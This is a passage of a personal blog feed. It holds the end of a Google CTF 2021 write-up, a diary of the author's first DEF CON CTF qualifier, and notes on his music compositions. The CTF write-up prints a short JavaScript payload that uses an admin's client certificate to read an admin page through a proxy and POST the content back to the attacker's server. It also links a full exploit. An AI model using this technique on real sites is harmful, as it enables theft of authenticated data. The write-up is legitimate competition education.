<p>There is clearly some Man-in-the-Middle attack going on. A replay attack won’t work as the TLS’s cipher key is generated randomly each time. However, notice that the website is accessed using a headless Chrome, meaning that it should also be executing anything ranging from <code class="language-plaintext highlighter-rouge">iframe</code> to <code class="language-plaintext highlighter-rouge">script</code> on our controlled sub-domain.</p>

<h2 id="exploit">Exploit</h2>

<p>Embedding a JavaScript that fetches the content of <code class="language-plaintext highlighter-rouge">admin.zone443.dev</code> on our controlled site using admin’s cert seems to be a good idea, but it is impossible to steal the content because of the Cross-Origin Resource Sharing policy. However, CORS enforces this by checking the domain name on the client site, is there a way to circumvent this protection?</p>

<p>This is a scenario that is very like DNS rebinding, where we have to trick the client into thinking it’s accessing the same domain name, so no CORS in effect, but in fact it’s using its credentials on another website.</p>

<p>Notice that we have control over the entire sub-domain, and that the <code class="language-plaintext highlighter-rouge">admin.</code> site doesn’t validate SNI nor Host, meaning we can <strong>set up a proxy in the back-end that redirects anything sent from the client to <code class="language-plaintext highlighter-rouge">admin.zone443.dev:443</code> and back</strong>. Although we aren’t able to intercept anything of the actual communication because of TLS encryption, we can <strong>acquire the content in the front-end</strong> and send the data back to ourselves.</p>

<p>That means we can first make the admin access our controlled sub-domain <code class="language-plaintext highlighter-rouge">https://xxx.zone443.dev/</code>, so that it will execute a JavaScript payload on our website. The payload looks something like this:</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">fetch</span><span class="p">(</span><span class="k">new</span> <span class="nc">Request</span><span class="p">(</span><span class="dl">'</span><span class="s1">/</span><span class="dl">'</span><span class="p">)).</span><span class="nf">then</span><span class="p">(</span><span class="nx">resp</span> <span class="o">=&gt;</span> <span class="nx">resp</span><span class="p">.</span><span class="nf">text</span><span class="p">()).</span><span class="nf">then</span><span class="p">(</span><span class="nx">body</span> <span class="o">=&gt;</span>
    <span class="k">return</span> <span class="nf">fetch</span><span class="p">(</span><span class="k">new</span> <span class="nc">Request</span><span class="p">(</span><span class="dl">'</span><span class="s1">/</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span>
        <span class="na">method</span><span class="p">:</span> <span class="dl">"</span><span class="s2">POST</span><span class="dl">"</span><span class="p">,</span>
        <span class="na">body</span><span class="p">:</span> <span class="nx">body</span><span class="p">,</span>
    <span class="p">}));</span>
<span class="p">});</span>
</code></pre></div></div>

<p>This script will try to fetch the content on the <strong>same</strong> domain name <code class="language-plaintext highlighter-rouge">https://xxx.zone443.dev/</code>, but as we set up a proxy already, the request is actually sent over to <code class="language-plaintext highlighter-rouge">admin.zone443.dev:443</code> and back. Then the acquired content will be send again back to our server via a <code class="language-plaintext highlighter-rouge">POST</code> request, where we will be able to see what the content on the <code class="language-plaintext highlighter-rouge">admin.</code> is like to the admin’s side.</p>

<p>In the actual payload, we can keep track of the TCP requests made, so on the first and third request, we use our own TLS cert and server to handle the request, but on the second request, we will redirect the address to <code class="language-plaintext highlighter-rouge">admin.</code> so that the content can be stolen. Notice that this is not as time-sensitive as a normal DNS rebinding would be, as there is no “caching” mechanism for TLS connections. Although potentially HTTP2 Multiplexing might affect the result, I didn’t really encounter that in my exploit, and it can be easily mitigated by closing the connection on the server side.</p>

<p>The exploit is easy to write with the help of Go’s built-in <code class="language-plaintext highlighter-rouge">tls</code> and <code class="language-plaintext highlighter-rouge">http</code> packages.</p>

<p><img src="/assets/images/google-ctf-2021/empty-ls.png" alt="empty-ls" /></p>

<p>The exploit is over here <a href="https://gist.github.com/superfashi/5ad6d7ea91357611fb7b2fb64138fc43">EMPTY LS, Google CTF 2021</a>. It is not host dependent, so you can simply run it without changing anything (other than to put X.509 cert/key pair in the right place).</p>]]></content><author><name>Hanbang Wang</name><email>contact@hanbang.wang</email></author><category term="blog" /><category term="Programming" /><category term="CTF" /><category term="Hacking" /><category term="Reversing" /><category term="Web" /><category term="Hardware" /><summary type="html"><![CDATA[This weekend I was planning to play The Great Ace Attorney: Adventures with my SO.]]></summary></entry><entry><title type="html">My First CTF Experience</title><link href="http://0.0.0.0/blog/my-first-ctf-experience/" rel="alternate" type="text/html" title="My First CTF Experience" /><published>2021-05-04T10:30:00-04:00</published><updated>2021-05-04T10:30:00-04:00</updated><id>http://0.0.0.0/blog/my-first-ctf-experience</id><content type="html" xml:base="http://0.0.0.0/blog/my-first-ctf-experience/"><![CDATA[<p>I was one of the <a href="https://ctftime.org/team/38838">Tea Deliverers</a> at <a href="https://oooverflow.io/dc-ctf-2021-quals/">DEF CON 29 CTF Quals</a>.
<!--more--></p>

<p>I had the luck to play in this famous CTF event with some of the best hackers out there, and I definitely couldn’t miss this opportunity even though it’s a 5-day vacation here in China for the International Workers’ Day.</p>

<p>This is <strong>NOT</strong> a write-up <strong>NOR</strong> a blog for a general viewer, but merely a record of what I did and what I thought about this first ever CTF I’ve done.</p>

<h1 id="0x00">0x00</h1>

<p>I honestly had no idea who I was going to work with before the event. I was simply asked by my supervisor during my internship at Chaitin if I want to be in a CTF team, and I said yes. Later I was connected to <a href="https://github.com/zTrix">@zTrix</a>, the CTO of the company, and later joined a team that is called <em>Tea Deliverers</em>, which is obviously one the best CTF teams in the entire world.</p>

<p>Fun fact, the company founders got to know each other at CTF events, and they founded this security company together because of their experiences as teammates.</p>

<p>I signed myself in to be one of the “web gangs,” and told the group leader I am probably good at XSS (although I have probably done more binary reversing than XSS, both I’m not good at). Spoiler alert, only later to found out that there’s practically no web questions in this CTF, sad.</p>

<p>We had a fancy dinner the eve before the match at a seafood/hotpot/BBQ buffet place, which is pretty notable cause who doesn’t like free food.</p>

<p>The competition starts at 8 AM China local time, and lasts for 48 hours non-stop, so I better get some good sleep.</p>

<h1 id="day-1">Day 1</h1>

<p>I arrived at our “base,” which is just an office room in the company, slightly after the release of the first challenge, <em>say-hellooo</em>.</p>

<h2 id="say-hellooo">say-hellooo</h2>

<blockquote>
  <p>8:00 AM</p>
</blockquote>

<p>This challenge simply asks to call the event host @Zardus and ask for the flag. Finding the phone number was rather easy, by going to the host’s twitter, where he links his personal website, and where his CV can be found. On his CV there’s his phone number. I called over and after some chitchat, he said that the flag is “<em>hellospacehackers</em>, all lower case.” And…… it’s not correct.</p>

<p>But of course it is correct, only I was stupid to not realize that when he said “space” it refers to the whitespace instead of the word. After reminded by my teammate, I got the first flag for the team, and spoiler alert, my only flag during the event.</p>

<h2 id="baby-a-fallen-lap-ray">baby-a-fallen-lap-ray</h2>

<blockquote>
  <p>8:05 AM</p>
</blockquote>

<p>Although I didn’t sign-up for a pwn question, and I practically had no pwn experiences ever other than some basically stack overflow knowledge, I still took a look at the challenge and tried to find out what this is about, since this challenge is the only one released at the time.</p>

<p>Inside the package there is one executable in elf format, which is the entry point to the service, called <code class="language-plaintext highlighter-rouge">manchester</code>, and a few binaries that starts with the magic header <code class="language-plaintext highlighter-rouge">sephiALD</code>, and a mysterious file <code class="language-plaintext highlighter-rouge">p</code> that contains strings of the menu when we connect to the server.</p>

<p>There was one link that points to the source code of a challenge in the previous year’s DEF CON Finals, and it’s seemingly the same thing, where <code class="language-plaintext highlighter-rouge">manchester</code> is actually an implementation of a <em>Manchester dataflow machine</em>. Thought that someone must have a disassembler since this question comes from a previous year, but I can’t find any. So I think it might be a good idea to start with a disassembler using the <code class="language-plaintext highlighter-rouge">assmbler.py</code> provided.</p>

<p>Firstly it is easy to build an unpacker and disassembler, but it is a bit confusing to change the raw operations into the forms of a <code class="language-plaintext highlighter-rouge">.tass</code> file, mainly I couldn’t figure out how the arguments work. One teammate who has read the paper walked me through how parallelism and dataflow works in this machine, and I was able to get a grasp on the idea. Yet recover the assembled binary back into human readable <code class="language-plaintext highlighter-rouge">.tass</code> might still be to much for me.</p>

<p>Teammates who are reversing this tells me that the opcodes and some internal structures are switched, however they are able to quickly figure out the new opcodes are and updated the table. Also they figured out that the mysterious file <code class="language-plaintext highlighter-rouge">p</code> was ran by the <code class="language-plaintext highlighter-rouge">vm</code>, and <code class="language-plaintext highlighter-rouge">vm</code> was ran by the <code class="language-plaintext highlighter-rouge">manchester</code>, so figuring out how <code class="language-plaintext highlighter-rouge">manchester</code> works was the first step, and we still had to reverse <code class="language-plaintext highlighter-rouge">vm</code> and then reverse <code class="language-plaintext highlighter-rouge">p</code> and pwn <code class="language-plaintext highlighter-rouge">p</code>.</p>

<p>Noticed that there was a graphing function to draw a dataflow of the program. With my current disassembler I could use that function to draw out a graph. However it was simply way too large and makes no sense at all.</p>

<p>I unfortunately has no other good ways to continue this problem, so I hand over my code to my teammates and worked on other problems.</p>

<h2 id="nooombers">nooombers</h2>

<blockquote>
  <p>11:30 AM</p>
</blockquote>

<p>I took a look at the challenge while doing <em>baby-a-fallen-lap-ray</em>, and people somehow just miraculously figure out what each operation mean. After some conversation I still don’t get how they manage to figure that out, probably by comparing it against common signature algorithms, or just eyeballing. Didn’t know what was happening so I left the challenge.</p>

<h2 id="exploit-for-dummies">exploit-for-dummies</h2>

<blockquote>
  <p>4:40 PM</p>
</blockquote>

<p>Trivia, but definitely not trivial. The trivia part was rather easy, there were only 25 questions and you didn’t need to get all of them in order to pass the 5000 score mark. The flag was read into the memory but at a random mmapped location with a random offset. These two addresses are erased from the stack, but there was one number that equals to the offset xoring some random numbers that were stored both on stack and heap.</p>

<p>If we manage to crash the program, the front-end will spin up a gdb, and we can input an address that starts with <code class="language-plaintext highlighter-rouge">0x</code> and gdb will print out a string located at that place. Nonetheless, it is definitely impossible to guess plainly of where the string is stored at.</p>

<p>My first intuition was there might be some exploits in that version of gdb, and we could write something using the save mechanism of the trivia game to pwn gdb. After some discussions with the teammates, we all agreed on that we should focus on gdb because there seemed to not have any bugs in that trivia game other than that file handle close crash.</p>

<p>After some play with gdb, I was able to get the address of the aforementioned number using <code class="language-plaintext highlighter-rouge">0x0+environ</code> trick. However I got stuck because there were seemingly nothing I can do anymore. Written to <code class="language-plaintext highlighter-rouge">core</code> file is not an option as a crash would simply overwrite it.</p>

<p>Teammates found out some files that gdb would go and read, including <code class="language-plaintext highlighter-rouge">iofclose.c</code>, <code class="language-plaintext highlighter-rouge">.gdb_history</code>, and <code class="language-plaintext highlighter-rouge">trivia.debug</code>. But weirdly all of us couldn’t figure out how this relates to shellcoding. I unfortunately lost interest in this challenge, so I went on with the new challenges.</p>

<h2 id="rick">rick</h2>

<blockquote>
  <p>10:00 PM</p>
</blockquote>

<p>Two hours since the release of the problem with no significant progress made by my teammates. I jumped in to see where we at.</p>

<h3 id="level-1">Level 1</h3>

<p>I opened the OpenGL game, and there was one big building, a lever and a strange black cube that fell into the ground, with “Level 1” written on the corner of the program window. I played around and figured out the basic controls. I peeked into the door crack and saw there’s a yellow lever inside, so it must be that we need to enter the building.</p>

<p>Having wireshark in the background, I also see that the game connects to the server when it starts but sent nothing to the server. And the server will automatically disconnect with <code class="language-plaintext highlighter-rouge">KO</code> after 15 seconds.</p>

<p>Still, didn’t want to touch Ghidra and IDA, I used <code class="language-plaintext highlighter-rouge">scanmem</code> to try to find the variables that controlled the player coordinates. However I was not able to find the exact variable, and I could only filter down to ~50 locations in memory. Setting them all at once apparently breaks the game.</p>

<p>One of my teammates was pretty smart and point out we could just go and look the cross-references to <code class="language-plaintext highlighter-rouge">gluLookAt</code>, since it calculates the transformation matrix for the camera. Indeed I found six helper functions that get the eye coordinates and the look vector. Using gdb to set the value was way too much of a hassle, so I wrote a frida script that intercepts one of the functions, print and change the values at my will.</p>

<p>Teleported into the building just to see a giant rick roll (which is what I anticipated seeing rick as the title of the challenge). The image had Rick Astley saying “Don’t Cheat,” and apparently teleporting was not an option. Somehow I thought it might be that the clue is hidden in the textures, that if you manage to open the door without cheating another image would appear. So I dumped all the textures just to find nothing there.</p>

<p>Then there were teammates figuring out that the button ‘E’ does something, by back-tracing from the call to <code class="language-plaintext highlighter-rouge">send</code>, and observed there were some conditions needed to be met in order to enter the function that sends something to the server. I simply hooked that function to let it always return 1, and whoosh the door opens, with the lever and block outside turns white, but nothing else happened.</p>

<p>Further reversing of the function revealed that it go through all the levers in the map and checks if the player is in the bounding box of something. Returns 1 if it indeed is. However there were some other things done in the function that simply hooking this function will not do. I therefore hooked into the actual low level checking function. And boom, I was in level 2.</p>

<h3 id="level-29">Level 2~9</h3>

<p>Didn’t know what happened, but wireshark told me that an interaction with the server had been done. It was not too long after that that we finally figure out that you can simply press ‘E’ on the levers to trigger them. Being a gamer for so long not realizing that, I was disappointed in myself.</p>

<p>Able to manually fly through the first 6 levels as a gaming boi within 15 seconds each level, starting from 7 there were too many levers to do manually. So I wrote some script to automate the process, with hardcoded levers to press.</p>

<h3 id="level-10">Level 10</h3>

<p>And then I arrived at level 10, where I realized that the logic is random each time you play it. I, because the lack of experience, thought that this must be the final level, cause it’s different from the rest.</p>

<p>Still didn’t want to do much work because I was pretty tired at that time, I figure out one combination of levers that would work to pass level 10, and just put my script there running, hoped that by randomization it would be sooner or later that this combination works again.</p>

<p>And indeed it worked, only that I was met by level 11.</p>

<h3 id="level-1137">Level 11~37</h3>

<p>Okay, it’s time to fuzz, I thought. While others were still reversing the protocol, I started to write my algorithm to automatically switch the levers at random, and see if the door opens. I first let each lever has a certain probability \(p\) to be on, but the effect is not so good and only gets me through the first 17 levels. Later by observation I realized only the lower end of levers are constantly being switched and not the higher-indexed ones. Then I realized that since each function only detects the lever once, each lever actually has no equal probability of being switched, but it’s rather a geometric distribution.</p>

<p>Tried a lot of ways to fix, including generating a random number that represents 1 and 0s of the lever, and also tried to fix the probability by giving each of them different Bernoulli distribution and see how it goes. Finally I settled down on a way which recorded the index of the last lever being pulled, to make sure that each lever has the chance of being pulled at least once. And check the state of the final gate to make sure we get to the next level as soon as we have an acceptable answer. I also play around with different probability distribution because apparently there were some levels that requires a lot of levers being pulled and some requires less.</p>

<p>I also optimizes a lot of other things. I first teleport around to press the levers, only to realize that was pretty inefficient. Later I simply had the ‘E’ hold down for all the time and tell the function to return true at my intended lever index, by keeping an internal counter. I also hooked <code class="language-plaintext highlighter-rouge">glutSetTimer</code> to make the arguments being 0 so each refresh is way quicker and a lot more trials can be done within 15 minutes.</p>

<h3 id="level-37100">Level 37~100</h3>

<p>I was able to get to the 37th level, but no further progresses can be made by fuzzing. I kind of already know that this should be using a CSP or BSP solver, because LiveOverflow once done a challenge that was pretty similar to this. In the meanwhile, my fellow teammates finally reversed the protocol and realize that it is simply a tree structure that goes from the levers to the final gate. So all they have to do is to write the exploit now.</p>

<p>At 6:45 AM the second day, we got the flag.</p>

<h1 id="day-2">Day 2</h1>

<p>There were still no web questions released, so I took a look at various questions.</p>

<h2 id="pza999">pza999</h2>

<blockquote>
  <p>6:50 AM</p>
</blockquote>

<p>Downloaded the package, just to realize there’s another QEMU VM kernel image. Have no idea what to do.</p>

<h2 id="segnalooo">segnalooo</h2>

<blockquote>
  <p>7:00 AM</p>
</blockquote>

<p>Another pwn. The reversing part seemed straightforward, and the input seemed to take in a hex number. I tried “0000” locally and it goes through to the next line of output, but when I tried the same on the server it says “invalid hex,” and won’t let me proceed. Again didn’t what to do next.</p>

<hr />

<p>After less than 3 hours of sleep, I woke up from a camp bed at 9:30 AM, and jumped back to work.</p>

<h2 id="coooinbase">coooinbase</h2>

<blockquote>
  <p>9:40 AM</p>
</blockquote>

<p><code class="language-plaintext highlighter-rouge">src</code> is actually a <code class="language-plaintext highlighter-rouge">.gz</code> file, after decompression there were a <code class="language-plaintext highlighter-rouge">.html</code> the front end, a <code class="language-plaintext highlighter-rouge">.rb</code> the backend and <code class="language-plaintext highlighter-rouge">.sh</code> which runs the QEMU VM. The front-end takes input and feed into the ruby backend, the backend check conditions on the input and bson→base64 encoded it, and fed it into the virtual machine. However, I had no idea how to statically analyze the kernel image (it’s not an elf), and I’m not a pwn technician, so I can do really no help here.</p>

<h2 id="smart-cryptooo">smart-cryptooo</h2>

<blockquote>
  <p>10:30 AM</p>
</blockquote>

<p>Challenge was tagged machine learning and easy, seems suitable for a noob like me. Trained the model for some time and was able to encrypt and decrypt custom message successfully. The file name indicates that the original text was from <code class="language-plaintext highlighter-rouge">philosophy.html</code> in OOO’s website. Certainly there were more to it.</p>

<p>After taking a look at the python file, it was pretty easy to figure out the entire encryption and decryption process, and how the models are trained. The default message and key size are 64 <em>bits</em>, where one bit is actually a float64 number, and we’ll use these numbers from now on.</p>

<h3 id="alice-and-encryption">Alice and encryption</h3>

<p>Alice is a 4-layer model that encrypts a message with a key. It takes in a plain text message (1×64 vector) and a key (1×64 vector), and outputs the encrypted message (1x64 vector). The encryption procedure of an entire text goes like this:</p>

<p>First split the text into groups of 8-byte message, use space to pad the end. Then each 8-byte message gets converted into a big-endian 64-bit number. Each message then will be converted into a 1×64 feature vector, where one bit corresponds to one feature, and if the bit is a 1, the feature is a -1, otherwise the feature is a 1. Every 16 (<code class="language-plaintext highlighter-rouge">bunch_size</code>) messages will be grouped into a bunch, and encrypt using the same key by putting these 16 messages alongside with the key into the Alice model. A random 8-byte (64-bit) key will also be generated to use to encrypt the next bunch of messages. And this randomly generated key will be encrypted with the current key and be appended to the current bunch of encrypted messages.</p>

<h3 id="bob-and-decryption">Bob and decryption</h3>

<p>The Bob model has exactly the same structure as Alice. The only difference is that it functionally takes in an encrypted message and that key that was used to encrypt it, and outputs the decrypted message. The decryption procedure is the reverse of the above procedure by using the bob model, nothing special.</p>

<h3 id="the-magic-eve">The magic Eve</h3>

<p>How to prevent the model just being lazy and don’t encrypt at all? That’s when the eve model steps in. So the Eve is identically to the Alice and Bob model, excepts that it has new input layer before the original input layer, where it takes in only the encrypted message and densely connected it to the original input layer. Now we define the loss of the eve model as the absolute difference between the output of the eve model and the corresponding plain message, meaning that if we could train eve model to have a small loss, then we would be “breaking” the encryption.</p>

<h3 id="abe-model">ABE model</h3>

<p>Now we define a new ABE model, such that we train the above three models at the same time. We randomly generated a plain message and a key, encrypt it using the Alice model, decrypt it using the Bob model, and we define the Alice-Bob Loss as the difference between the original message and the decrypted message. We feed that encrypted intermediate message into eve, and calculate the Eve Loss. The ABE model loss is the defined as \(\text{Alice-Bob Loss} + \frac{\left(32 - \text{Eve Loss}\right)^2}{ 32^2 }\), \(32\) is half the message size. Don’t know where it got the equation from, but apparently this model is a Adversarial Network, as it wants Alice-Bob Loss to be as small as possible, in the meanwhile the Eve Loss as large as possible.</p>

<hr />

<p>Now with the above sorted out, I started to experiment with a lot of things. First, I confirmed that encryption and decryption depends heavily on the weights/training time instead of the model. Meaning if I encrypted a message with a Bob model that I trained for 5 minutes, the model that I trained for 30 minutes cannot be used to decrypt it with the correct key, and vice versa. Second, I realized that if you didn’t train the models long enough, the decryption could be broken easily. Third, even if the keys aren’t right, the entropy of the message would stay roughly the same, which means if you get the decrypted message being mostly 0x00 or 0xFF, then it is most likely that the model weights affected it, instead of the key being wrong.</p>

<p>So I first tried to observe the training process. For each epoch, I decrypt the first 8 bytes (message) of the given encrypted message and a random key, see when it would spit out a decrypted text that looked of right entropy. I observed for a long time but it doesn’t seem to give off any useful information.</p>

<p>I then though it might be possible to use the eve model to do something. I knew that eve model must already have a large enough loss for the ABE model to work, so it won’t work if I tried to use it to decrypt the entire message. However, that is under the assumption that the keys are different each time. What if the eve model could work if the decryption keys are the same, and the weights would do the magic?</p>

<p>In the meanwhile, my teammates were able to find some repeating messages (8-bytes) in the original html, and were able to figure out where the changes were made by comparing the location of the repeating messages in the same bunch of the plain text and the given encrypted message. They concluded that one change happened at around 12,000 bytes.</p>

<p>This give me much hope as I could be sure that no changed were made before 10,000 bytes, which meant I had about 1,250 training points to use. My idea was, to first use the first 16 messages to train an eve model so that it decrypts these 16 messages and consequently the first generated key stored at the 17th message. And then use the next 16 messages to train another eve model that would do the same job. After finding the keys for the first 1,250 messages, I could use these to train a Bob model that works for this dataset, and use it to decrypt the entire text.</p>

<p>However, someone beat me to it and got the flag. When I look at his exploit, there were <strong>NO</strong> machine learning stuff used. The exploit simply calculated some matrix and solved a linear matrix equation to get a transformation matrix between the encrypted message and the plain message. I was like, WHAT?</p>

<h2 id="threefactooorx">threefactooorx</h2>

<blockquote>
  <p>2:30 PM</p>
</blockquote>

<p>While doing <code class="language-plaintext highlighter-rouge">smart-cryptooo</code>, I jumped out to see what’s going on with this literally “one-and-only” web challenge. There was only a website to upload a html file, and one file to download which has an <code class="language-plaintext highlighter-rouge">.crx</code> extension. I realized that it must be to write a html exploit that cracks this chrome plugin. Unzipping the plugin we find two scripts, one background JS file that seemingly returns the flag, and another JS that is obfuscated. However, it really wasn’t that much of an obfuscation and with a bit of manual restoring of the strings it is pretty clear what we need to do in order for the script to print the flag for us.</p>

<p>There were too many other people working on this challenge, and they were all faster than me since I was late in the game. Not for too long they got the flag.</p>

<h2 id="looocked-ooout">looocked-ooout</h2>

<blockquote>
  <p>12:15 AM, after midnight</p>
</blockquote>

<p>Before I went to sleep, I wanted to take a look at if there’s anything I still could do for the team. And yet another pwn. I think it might be to pwn the given <code class="language-plaintext highlighter-rouge">cid</code> binary, which is seemingly an mp3 loader, maybe craft a special mp3 or something. Dragged it into Ghidra, analyzed, decompiled, shook my head, and closed all the windows.</p>

<h1 id="0xff">0xFF</h1>

<p>Woke up after the event was over. Really nice to see that our team was at the third place, meaning a qualification for the finals (although I won’t be there). Also really surprised to see that there were even a time (an hour before the end) we were in the first place, although I contributed nothing to it.</p>

<p>After playing in such a professional, competitive, and finesse CTF event, I think that I still got a lot to learn, more specifically practicing pwn and reversing. One thing I feel okay about myself is that I can keep up with the pace, and at least I still provided some insights for my teammates in some of the questions, even though it’s my first time in a CTF. Also, the format is a jeopardy instead of attack-defense, which is another whole new area that I had absolutely no experiences in.</p>

<p>CTF is definitely interesting something I want to experience again. Before then, see you next time.</p>

<hr />

<p>P.S. I have this idea where I think it might be interesting if I can come up with an easy CTF/ARG for the university students to play in, if you have the same idea, contact me!</p>]]></content><author><name>Hanbang Wang</name><email>contact@hanbang.wang</email></author><category term="blog" /><category term="Programming" /><category term="CTF" /><category term="Hacking" /><category term="Pwn" /><category term="Reversing" /><category term="DEFCON" /><summary type="html"><![CDATA[I was one of the Tea Deliverers at DEF CON 29 CTF Quals.]]></summary></entry><entry><title type="html">Compositions</title><link href="http://0.0.0.0/blog/compositions/" rel="alternate" type="text/html" title="Compositions" /><published>2020-12-14T23:45:00-05:00</published><updated>2020-12-14T23:45:00-05:00</updated><id>http://0.0.0.0/blog/compositions</id><content type="html" xml:base="http://0.0.0.0/blog/compositions/"><![CDATA[<p>Here are some of my compositions in music.
<!--more--></p>

<h1 id="musc-79">MUSC 79</h1>

<h2 id="dream-in-pure-data">Dream in Pure Data</h2>

<iframe style="border: 0; width: 100%; height: 307px;" src="https://bandcamp.com/EmbeddedPlayer/album=2432380295/size=large/bgcol=ffffff/linkcol=7137dc/artwork=none/transparent=true/" seamless=""><a href="https://superfashi.bandcamp.com/album/intro-to-electronic-music">Dream in Pure Data by SuperFashi</a></iframe>

<p>A 1h30m run of my pure data patch.</p>

<h2 id="retro-gameplaying-as-instrument-interface">Retro Gameplaying as Instrument Interface</h2>

<iframe width="560" height="370" src="https://www.youtube-nocookie.com/embed/W4_LWxrSHR4" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen=""></iframe>

<p>I think current instruments lack certain feedback to the performers and especially audiences. Live performances will normally have an auxiliary visual element (like laser lights synced to the music or generative visuals), which is more of an effect rather than a cause. Even for Launchpad performances, most of the time the visuals on the grid are nothing more than flashes of lights. It will be interesting, then, to perform an instrument by playing the game, or to play the game by performing the instrument, such that each interaction by the performer does not only create sounds/music, but also at the same time creates the visualization of the music (which is a gameplay meaningful by itself). This should further blur the line between sounds and visuals, and hopefully will create unique interactive feedback.</p>

<h1 id="musc-77">MUSC 77</h1>

<iframe style="border: 0; width: 100%; height: 307px;" src="https://bandcamp.com/EmbeddedPlayer/album=2774807423/size=large/bgcol=ffffff/linkcol=7137dc/artwork=none/transparent=true/" seamless=""><a href="https://superfashi.bandcamp.com/album/intro-to-electronic-music">Intro to Electronic Music by SuperFashi</a></iframe>

<p>All music were produced with a MacBook Pro and Logic Pro stock plugins and instruments.</p>

<p>Recorded, written, composed, programed, mixed, mastered by me.</p>

<h2 id="elevator-music">Elevator Music</h2>

<p>The entire track was made from a field recording of an elevator in Harrison College House. The elevator runs through 26 floors (24 floors plus the bottom level and the penthouse), thus made the natural 1+4x6+1 structure. I used the first buzz as a lead-in, then the next 4x6 as 6 different sections where there are 4 buzzes (bars) in each section, and the last one buzz as the final climax.</p>

<p>All sounds were derived from the original recording by routing the raw recording to different buses with different effects. No synthesizer/sampling/flex-pitch involved.</p>

<h2 id="tech-no">Tech, no?</h2>

<p>The track follows the idea of a 2/4 - 3/4 - 4/4 meter change. The 2/4 meter doesn’t exist in the composition but exists as a 2-against-3 polyrhythm on the 3/4 meter. I hand-tuned some of the cymbal notes to accent downbeats and upbeats, but instead of the actual upbeat and downbeat of the meter, I accented them in different places to produce a polymeter feeling.</p>

<p>Only Drum Synth was used in this track for instrumentation. Automation was heavily used to adjust parameters of different Drum Synths to simulate a realistic drum playing effect.</p>

<h2 id="none-shall-sleep">None Shall Sleep</h2>

<p>The track uses samples from a version of “Nessun dorma” performed by Luciano Pavarotti. The choice of sampling from opera is to deviate from the normal mindset of sampling from 70s/80s songs. Only the drum and electronic piano is not from the sample.</p>

<p>The sample was loaded in by Q-sampler and sample points were hand-chosen. The “fake-out intro” plays 2X speed of the sample, while the actual track uses 4X speed of the sample. The entire sample is pitch-shifted 10 semitones up.</p>

<h2 id="dark-woods">Dark Woods</h2>

<p>7 Retro Synths and 1 Alchemy were used for this track. Synths with different textures were introduced one by one to draw the listener’s focus to the new timbre. Automations are used for mixing while multiple Randomizer and Modulator are used for synth parameters.</p>

<p>An A=432Hz and 17-TET Pythagorean tuning system is used in this work. This is inspired by, of course, Wendy Carlos.</p>

<h2 id="dance">Dance</h2>

<p>Heavily inspired by Yasutaka Nakata’s work, I wanted to make a similar work that features his signature dance pop style. I chose the classic Verse-Chorus in ABA’BCB form, with Intro and Pre-Chorus in mind, which is what he uses a lot on his productions for KPP.</p>

<p>Also influenced by him, the choice of transition between sections was done in a seamless manner. Subtle hints in harmony, melody and percussion were used to pace the song and push the energy into the next section.</p>

<h1 id="musc-70">MUSC 70</h1>

<h2 id="for-bg">For B.G.</h2>

<p>This is the second composition work for the course. We are asked to use simple triads in our piece, and use roman numerals with a bass note to represent them. I also added a staccato flavor and a key change in the middle just to make the piece sounds a bit more unique. The beginning interval was borrowed from <em>Cambridge, 1963</em> by Jóhann Jóhannsson, which I think has a very bright feeling.</p>

<p>The piece was named <em>For B.G.</em> simply because I asked her what a good name would be and she said “why not have it for me.” (or something like that)</p>

<h3 id="musescore"><a href="https://musescore.com/user/2376136/scores/6506108/s/shDAdb">MuseScore</a></h3>

<iframe width="100%" height="394" src="https://musescore.com/user/2376136/scores/6506108/s/E7s3lf/embed" frameborder="0" allowfullscreen="" allow="autoplay; fullscreen"></iframe>

<h3 id="soundcloud"><a href="https://soundcloud.com/user-906245806/hanbang-wang">SoundCloud</a></h3>

<p>Performed by Erin Busch.</p>

<iframe width="100%" height="166" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/934155934&amp;color=%23ff5500&amp;auto_play=false&amp;hide_related=false&amp;show_comments=true&amp;show_user=true&amp;show_reposts=false&amp;show_teaser=true"></iframe>
<div style="font-size: 10px; color: #cccccc;line-break: anywhere;word-break: normal;overflow: hidden;white-space: nowrap;text-overflow: ellipsis; font-family: Interstate,Lucida Grande,Lucida Sans Unicode,Lucida Sans,Garuda,Verdana,Tahoma,sans-serif;font-weight: 100;"><a href="https://soundcloud.com/user-906245806" title="Music 70" target="_blank" style="color: #cccccc; text-decoration: none;">Music 70</a> · <a href="https://soundcloud.com/user-906245806/hanbang-wang" title="Hanbang Wang" target="_blank" style="color: #cccccc; text-decoration: none;">Hanbang Wang - For B.G.</a></div>

<h2 id="over-the-rainbow">Over the Rainbow</h2>

<p>This is the third and final composition assignment for the course. We are asked to use seventh chords in this piece and write it in a lead sheet style. I write it as a AABA format like a pop song, but so slow that it’s like a lullaby lol. The piece was named <em>Over the Rainbow</em> because I wrote a lot of almost-octave jumps and just reminds me of that song.</p>

<h3 id="musescore-1"><a href="https://musescore.com/user/2376136/scores/6506112/s/widVlU">MuseScore</a></h3>

<iframe width="100%" height="394" src="https://musescore.com/user/2376136/scores/6506112/s/3UOr-p/embed" frameborder="0" allowfullscreen="" allow="autoplay; fullscreen"></iframe>

<h3 id="soundcloud-1"><a href="https://soundcloud.com/user-906245806/hanbang-wang-over-the-rainbow?in=user-906245806/sets/music-70-fall-2020-composition-3">SoundCloud</a></h3>

<p>Performed by Erin Busch.</p>

<iframe width="100%" height="166" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/948189691&amp;color=%23ff5500&amp;auto_play=false&amp;hide_related=false&amp;show_comments=true&amp;show_user=true&amp;show_reposts=false&amp;show_teaser=true"></iframe>
